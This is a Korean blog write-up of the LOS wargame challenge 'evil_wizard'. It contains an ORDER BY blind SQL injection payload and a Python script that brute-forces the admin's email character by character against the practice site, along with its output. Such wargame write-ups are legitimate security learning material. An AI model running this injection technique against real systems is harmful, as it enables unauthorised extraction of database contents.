same with hell_fire? really? 를 보고 트릭이 더 있는 문제인가 싶었다.
근데 아무리 봐도 똑같은 것 같다.
그래서 일단 hell_fire 방법으로 풀어봐야겠다고 생각했다.
근데 hell_fire 방법 그대로 풀렸다;;;;
아마 hell_fire를 다른 방식으로 푸는 게 출제자의 의도였던 것 같다,,,,
?order=length(email)=30,id%23 일 때 admin이 아래로 간다. admin의 email 길이는 30이다.
import requests
import threading
cookies={"PHPSESSID":""}
roo = "_rubiya805@gmail.cm"
ad_email=""
for i in range(1, 31):
for c in range(33, 128):
url = f"https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=substr(email,{i},1)=char({c}),id%23"
res = requests.get(url, cookies=cookies)
if "100</td></tr><tr><td>admin" in res.text:
ad_email+=chr(c)
break
if i<=18 and c==127:
ad_email+=roo[i]
break
print(ad_email.lower())
output> aasup3r_secure_email@emai1.com
'워게임 > LOS' 카테고리의 다른 글
red_dragon(개행, 이분탐색) (0) | 2021.10.06 |
---|---|
[**] green_dragon (0) | 2021.10.06 |
hell fire(order by) (0) | 2021.10.05 |
dark_eyes(error based sqli 심화) (0) | 2021.10.05 |
iron_golem(참 거짓을 판별할 수 없는 blind sqli) (0) | 2021.10.05 |
댓글